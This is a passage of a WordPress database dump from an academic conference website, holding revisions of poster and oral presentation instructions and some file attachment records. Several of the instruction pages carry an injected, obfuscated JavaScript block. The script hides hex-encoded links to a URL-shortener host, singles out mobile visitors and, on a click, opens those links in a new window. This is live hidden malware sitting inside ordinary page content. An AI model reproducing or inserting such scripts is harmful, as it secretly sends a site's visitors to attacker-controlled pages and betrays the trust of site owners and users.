_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 21:11:34','2023-08-13 21:11:34','',5132,'https://gsw2023.com/?p=5176',0,'revision','',0),
(5177,1,'2023-08-13 21:37:15','2023-08-13 21:37:15','','GSW2023-Program-2023-08-13.pdf','','inherit','open','closed','','gsw2023-program-2023-08-13-pdf','','','2023-08-13 21:37:15','2023-08-13 21:37:15','',5122,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf.pdf',0,'attachment','application/pdf',0),
(5178,1,'2023-08-13 21:38:25','2023-08-13 21:38:25','','GSW2023-Program-2023-08-13','','inherit','open','closed','','gsw2023-program-2023-08-13','','','2023-08-13 21:38:25','2023-08-13 21:38:25','',5122,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf',0,'attachment','application/pdf',0),
(5179,1,'2023-08-13 21:40:11','2023-08-13 21:40:11','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <a href=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"><span style=\"color: #0000ff;\"><strong>Here</strong></span></a>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 21:40:11','2023-08-13 21:40:11','',5132,'https://gsw2023.com/?p=5179',0,'revision','',0),
(5190,1,'2023-08-14 14:26:23','2023-08-14 14:26:23','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2023 program and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2023 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink: https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','inherit','closed','closed','','5139-revision-v1','','','2023-08-14 14:26:23','2023-08-14 14:26:23','',5139,'https://gsw2023.com/?p=5190',0,'revision','',0),
(5193,1,'2023-08-15 04:21:56','2023-08-15 04:21:56','','d2','','inherit','open','closed','','d2','','','2023-08-15 04:21:56','2023-08-15 04:21:56','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/d2.jpg',0,'attachment','image/jpeg',0),
(5194,1,'2023-08-15 04:26:17','2023-08-15 04:26:17','','d1','','inherit','open','closed','','d1','','','2023-08-15 04:26:17','2023-08-15 04:26:17','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/d1.jpg',0,'attachment','image/jpeg',0),
